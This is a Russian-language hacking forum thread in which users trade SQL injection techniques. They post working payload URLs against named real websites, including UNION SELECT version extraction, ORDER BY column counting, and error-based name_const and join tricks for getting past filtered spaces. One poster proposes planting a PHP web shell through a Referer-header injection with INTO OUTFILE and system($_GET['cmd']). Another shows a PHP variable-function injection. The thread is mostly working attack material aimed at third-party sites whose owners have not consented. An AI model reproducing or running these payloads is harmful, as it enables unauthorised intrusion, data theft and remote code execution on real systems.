Вопросы по уязвимостям

[Tigger]

Цитата:

Сообщение от Nightmare

http://www.dmitrovlib.ru/part/index.php?id=28'
Ещё одна непонятная SQL, вообще без понятия что тут за фильтр.

Сразу ещё один вопрос:
http://1aikido.ru/index.php?id=-1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and'
Вывод есть в ошибку, однако мускул < 5.1 что не даёт мне выполнить удобную раскрутку в extractvalue
а как крутить через name_const не понятно...
Кого не затруднит, покажите пример, как вывести с лимитом первую запись table_name из information_schema.tables

По поводу первого:
http://www.dmitrovlib.ru/part/index.php?id=(28)and(substring(version(),1,1)=4) - FALSE
http://www.dmitrovlib.ru/part/index.php?id=(28)and(substring(version(),1,1)=5) - TRUE
http://www.dmitrovlib.ru/part/index.php?id=(28)ORDER/**/BY/**/8--+ - FALSE
http://www.dmitrovlib.ru/part/index.php?id=(28)ORDER/**/BY/**/7--+ - TRUE
http://www.dmitrovlib.ru/part/index.php?id=(28)and(1=2)UNION(SELECT(1),2,version (),4,5,6,(7))--+
5.0.89

На счет второго:
Используй вариант, предложенный v1d0q: https://rdot.org/forum/showpost.php?p=20287&postcount=12.
Запрос посылай не через браузер, проверил на твоем примере, работает.

[c411k]

Цитата:

Сообщение от yusmat

есть ли здесь уязвимость ?
нет никакакой фильтрации d
но если передавать методом get $_SERVER['argv'][0] будет on
и переменная $funk перепишеться

PHP код:

define( "open", isset( $_SERVER['argv'][0] ) );
$funk = NULL;
if ( isset( $_GET['d'] ) )
{
    $funk = $_GET['d'];
}
if ( open )
{
    $funk = "test";
}
$funk( $TestName, $res, $comment ); 


уязвим, если в php.ini register_argc_argv off

[DrakonHaSh]

asp + mssql - кавычка экранируется ' => ''
на null-byte выдает ошибку. информации о том, как mssql воспринимает null-byte не нашел.

есть ли хоть какие варианты по раскрутке ?
http://tinyurl.com/74nvyyn

[Lostnull]

DrakonHaSh
MSSQL
Comment Out Query
1)/*
2)--
3)%00

[~d0s~]

Цитата:

Сообщение от Nightmare

http://www.dmitrovlib.ru/part/index.php?id=28'
Ещё одна непонятная SQL, вообще без понятия что тут за фильтр.

Сразу ещё один вопрос:
http://1aikido.ru/index.php?id=-1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and'
Вывод есть в ошибку, однако мускул < 5.1 что не даёт мне выполнить удобную раскрутку в extractvalue
а как крутить через name_const не понятно...
Кого не затруднит, покажите пример, как вывести с лимитом первую запись table_name из information_schema.tables

Тут вопрос посерьезнее, что у тебя с памятью, даже я вспомнил что тебе уже раскуривали этот скул
https://rdot.org/forum/showpost.php?p=22695&postcount=1698

Насчет скули, то логически если query_string загоняется в бд + без рерайта, то /**/ для табуляции оптимален. А раз name_const у тебя в этой версии не дает ничего вывести, а extractvalue еще не появился, то rand

[Nightmare]

Цитата:

Сообщение от ~d0s~

Тут вопрос посерьезнее, что у тебя с памятью, даже я вспомнил что тебе уже раскуривали этот скул

Закончилась память, щас новой купил, на 16 гигов, должно быть нормально.
Так если серьёзно, я это не специально, у меня гиганский список напарсенный, я конечно дубли отсеиваю, но сбои всё равно происходят, а запомнить все адреса сайтов я не могу, впредь постараюсь быть внимательнее.

[nicco]

http://packetstormsecurity.org/files...2012-SA086.txt

[Nightmare]

Есть хороший хелп по раскрутке SQL когда фильтруется пробел, цитирую:

Цитата:

Сообщение от v1d0q

Когда нужно вывести информацию через error based sqli, без пробелов. Первый вариант который приходит это

Код:

'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/

Но этот вариант работает не всегда, почему? Я уже когда-то писал, нету времени искать.

Рабочий вариант который должен работать всегда был придуман примерно год назад, но о котором почему-то никто не написал.
BlackFun предложил использовать `` в name_const (за что ему большое спасибо), а я в свою очередь впихнуть в свой запрос, в котором мне так сильно были нужны кавычки для чтобы заставить "его" работать. (Заметка: в браузера работать не будет)

Код HTML:

1'and(1)=(select*from(select*from(information_schema.tables`a`)JOIN(information_schema.tables`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1

Но он к сожалению не полный, например как вывести в данной конструкции что то кроме версии, лично мне не понятно, и где бы найти пример раскрутки, было бы замечательно.

Например первый вариант даже user() не выводит, не говоря уж о выводе чего либо из информационной схемы, и уж тем более условий where

[QaRTiN]

ребят,подскажите, пожалуйста ...на ачате я помощи не нашел,возможно здесь умельцы найдутся

есть сайт,на нем есть файл error.log,в который записываются ошибки БД...на самом сайте вывод ошибок отключен...я нашёл ошибку и хотел спросить можно ли с помощью данного файла и правильно составленного запроса залить шелл или вывести хоть какую-ту нужную информацию?

часть файла еррор.лог:

Код:

[15-Apr-2012 18:29:23] Mysql Error:  - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: 			UPDATE sessions SET			partner='38',			partnerTyp='A',			template='01',			host='374',			kampagne='',			keywords='',			pageviews='1',			ref='1'"3000',			design_sitename='In Ist Drin',			design_headline='',			design_subline='',			design_individuell='0'			WHERE sid='1db420cb93a608c25c4c2990f164ea55'			 		 

[15-Apr-2012 19:19:05] Mysql Error:  - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: 			UPDATE sessions SET			partner='38',			partnerTyp='A',			template='01',			host='374',			kampagne='',			keywords='',			pageviews='1',			ref='1'"0000 union select version() --',			design_sitename='In Ist Drin',			design_headline='',			design_subline='',			design_individuell='0'			WHERE sid='792bce446a531fd049eaa1b174c5ecba'

ошибка возникает в заголовке referer (ref) (его следует добавлять при перехвате запроса чем-то вроде Tamper data)

[QaRTiN]

Цитата:

Сообщение от Oza

Это просто лог, не более того.
Если есть инклуд, sql inj, то знание путей пригодится при заливке шелла, и для чтения нужных файлов.

да я понимаю,что это лог...если получится найти LFI,то можно его заинклудить,заранее отправив в заголовке php-код...но разве нельзя,зная по этому файлу какой запрос к БД отправляется,отредактиров� �ть его так,чтобы он к примеру записал шелл...к примеру,если я добавлю в заголовке referer что-то вроде ') union select <?php system($_GET["cmd"]); ?> into outfile '/var/www/папка сайта/httpdocs/1asdf.php' -- то по сути должен бы создаться мини-щелл в корне сайта...подправьте,если ошибаюсь...только странно,что в еррор.логе знак '--' записывается как содержимое параметра ref, после него должно же было всё отбросится...